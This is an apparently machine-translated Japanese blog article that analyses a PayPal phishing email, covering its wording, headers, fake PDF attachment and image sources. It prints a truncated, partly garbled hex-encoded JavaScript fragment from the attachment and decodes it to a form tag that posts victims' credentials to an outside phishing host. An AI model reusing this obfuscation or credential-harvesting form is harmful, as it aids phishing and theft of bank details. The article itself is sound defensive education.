誰もがオンラインで情報を入手できる今日の世界では、いつでもウイルスを駆除できるため、フィッシングは最も人気があり壊滅的なオンライン攻撃の1つですが、銀行の詳細が盗まれると問題が発生します。これが私たちが受けたそのような攻撃の内訳です。
重要なのは銀行の詳細だけだとは思わないでください。結局のところ、誰かがあなたのアカウントログインを制御できるようになると、そのアカウントに含まれる情報を知っているだけでなく、同じログイン情報が他のさまざまな場所で使用される可能性があります。アカウント。また、メールアカウントが侵害された場合、他のすべてのパスワードをリセットできます。
したがって、強力で変化に富んだパスワードを保持することに加えて、本物になりすました偽の電子メールに常に注意を払う必要があります。ほとんどのフィッシングの試みは素人っぽいものですが、非常に説得力のあるものもあるため、表面レベルでそれらを認識する方法と、内部でどのように機能するかを理解することが重要です。
による画像 asirap
何が見えているかを調べる
私たちの例の電子メールは、ほとんどのフィッシングの試みと同様に、通常の状況では警戒するPayPalアカウントでのアクティビティを「通知」します。したがって、行動を促すフレーズは、考えられるほぼすべての個人情報を送信して、アカウントを確認/復元することです。繰り返しますが、これはかなり定型的です。
確かに例外はありますが、ほとんどすべてのフィッシングおよび詐欺メールには、メッセージ自体に直接赤いフラグがロードされています。テキストが説得力のあるものであっても、通常、メッセージが正当ではないことを示す多くの間違いがメッセージ本文全体に散らばっています。
メッセージ本文
一見したところ、これは私が見た中で最も優れたフィッシングメールの1つです。スペルや文法の間違いはなく、言葉遣いはあなたが期待するものに従って読みます。ただし、コンテンツをもう少し詳しく調べると、いくつかの危険信号が表示されます。
- 「Paypal」–正しいケースは「PayPal」(大文字のP)です。メッセージで両方のバリエーションが使用されていることがわかります。企業は自社のブランディングを非常に慎重に行っているため、このようなものが校正プロセスに合格するかどうかは疑わしいです。
- 「ActiveXを許可する」– Paypalの規模の合法的なウェブベースのビジネスが、特に複数のブラウザをサポートしている場合に、単一のブラウザでのみ機能する独自のコンポーネントを使用しているのを見たことがありますか。確かに、どこかでそれをしている会社がありますが、これは危険信号です。
- 「安全に。」 –この単語が段落テキストの残りの部分と余白に並んでいないことに注意してください。ウィンドウをもう少し伸ばしても、正しく折り返されたり、間隔が空けられたりしません。
- 「ペイパル!」 –感嘆符の前のスペースがぎこちなく見えます。私が確信しているもう一つの癖は、合法的な電子メールにはないでしょう。
- 「PayPal-アカウント更新フォーム.pdf.htm」–特にサイトのページにリンクできる場合にPaypalが「PDF」を添付するのはなぜですか。さらに、なぜ彼らはHTMLファイルをPDFに偽装しようとするのでしょうか。これはそれらすべての中で最大の危険信号です。
メッセージヘッダー
メッセージヘッダーを見ると、さらにいくつかの赤いフラグが表示されます。
- 差出人アドレスは てst@てst。こm 。
- 宛先アドレスがありません。これを空白にしませんでした。単に標準のメッセージヘッダーの一部ではありません。通常、あなたの名前を持つ会社があなたへの電子メールをパーソナライズします。
アタッチメント
添付ファイルを開くと、スタイル情報が欠落しているため、レイアウトが正しくないことがすぐにわかります。繰り返しになりますが、PayPalが自分のサイトへのリンクを提供できるのに、なぜHTMLフォームを電子メールで送信するのでしょうか。
注意: これにはGmailの組み込みHTML添付ファイルビューアを使用しましたが、詐欺師からの添付ファイルを開かないことをお勧めします。決して。これまで。多くの場合、PCにトロイの木馬をインストールしてアカウント情報を盗むエクスプロイトが含まれています。
もう少し下にスクロールすると、このフォームでPayPalのログイン情報だけでなく、銀行やクレジットカードの情報も要求されていることがわかります。一部の画像が壊れています。
このフィッシングの試みが一挙にすべてを追いかけていることは明らかです。
技術的な内訳
これがフィッシングの試みであることがはっきりとわかるはずですが、次に、電子メールの技術的な構成を分析して、何が見つかるかを確認します。
添付ファイルからの情報
最初に確認するのは、偽のサイトにデータを送信する添付フォームのHTMLソースです。
ソースをすばやく表示すると、すべてのリンクが有効であるように見えます。どちらも正当な「paypal.com」または「paypalobjects.com」を指しているためです。
次に、Firefoxがページ上で収集するいくつかの基本的なページ情報を見ていきます。
ご覧のとおり、一部のグラフィックは、正規のPayPalドメインではなく、「blessedtobe.com」、「goodhealthpharmacy.com」、「pic-upload.de」のドメインから取得されています。
メールヘッダーからの情報
次に、生の電子メールメッセージヘッダーを見てみましょう。 Gmailでは、メッセージの[オリジナルを表示]メニューオプションからこれを利用できます。
元のメッセージのヘッダー情報を見ると、このメッセージはOutlook Express 6を使用して作成されたことがわかります。PayPalには、古い電子メールクライアントを介してこれらの各メッセージを手動で送信するスタッフがいるとは思えません。
ルーティング情報を見ると、送信者と中継メールサーバーの両方のIPアドレスがわかります。
「ユーザー」IPアドレスは元の送信者です。 IP情報をすばやく検索すると、送信IPがドイツにあることがわかります。
また、中継メールサーバー(mail.itak.at)を見ると、IPアドレスはオーストリアを拠点とするISPであることがわかります。このタスクを簡単に処理できる大規模なサーバーファームがある場合、PayPalがオーストリアを拠点とするISPを介して直接メールをルーティングすることは疑わしいです。
データはどこに行きますか?
したがって、これはフィッシングメールであると明確に判断し、メッセージの発信元に関する情報を収集しましたが、データの送信先についてはどうでしょうか。
これを確認するには、最初にHTM添付ファイルを保存してデスクトップに保存し、テキストエディタで開く必要があります。それをスクロールすると、疑わしい外観のJavascriptブロックに到達した場合を除いて、すべてが正常に表示されます。
Javascriptの最後のブロックの完全なソースを分析すると、次のようになります。
<script language =” JavaScript” type =” text / javascript”>
//Copyright©2005Voormedia-WWW.VOORMEDIA.COM
var i、y、x =” 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e6e65742f6262732f7777772e646578706f737572652e6e6e65742f6262732f646174612f766572
</ script>
一見ランダムに見える文字と数字の大きな乱雑な文字列がJavascriptブロックに埋め込まれているのを見ると、通常は疑わしいものです。コードを見ると、変数「x」がこの大きな文字列に設定されてから、変数「y」にデコードされます。次に、変数「y」の最終結果がHTMLとしてドキュメントに書き込まれます。
大きな文字列は0〜9の数字とa〜fの文字で構成されているため、単純なASCIIから16進数への変換によってエンコードされる可能性があります。
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f2f7777772e64657870626f737267327f2e64657870626f737267327f2e646578706f73726732742f73742220616374696f6e3d22687474703a2f2f2f7777772e646578706f737267327f57e646578703a2f2f2f7777772f57706
翻訳:
<form name =” main” id =” main” method =” post” action =” http://www.dexposure.net/bbs/data/verify.php”>
これが有効なHTMLフォームタグにデコードされ、結果がPayPalではなく不正なサイトに送信されるのは偶然ではありません。
さらに、フォームのHTMLソースを表示すると、このフォームタグはJavascriptを介して動的に生成されるため、表示されないことがわかります。これは、テキストエディタで直接添付ファイルを開くのではなく、(以前に行ったように)添付ファイルの生成されたソースを誰かが単に表示した場合に、HTMLが実際に行っていることを非表示にする賢い方法です。
問題のあるサイトで簡単なwhoisを実行すると、これが人気のあるWebホスト1and1でホストされているドメインであることがわかります。
目立つのは、ドメインが(「dfh3sjhskjhw.net」のようなものではなく)読み取り可能な名前を使用しており、ドメインが4年間登録されていることです。このため、このドメインはハイジャックされ、このフィッシングの試みでポーンとして使用されたと思います。
皮肉は良い防御です
オンラインで安全を保つことになると、少し皮肉を込めても害はありません。
例の電子メールにはもっと多くの危険信号があると確信していますが、上記で指摘したのは、ほんの数分の調査の後に見た指標です。仮に、電子メールの表面レベルが正当な対応物を100%模倣した場合でも、テクニカル分析によってその真の性質が明らかになります。これが、見えるものと見えないものの両方を調べることができることが重要である理由です。
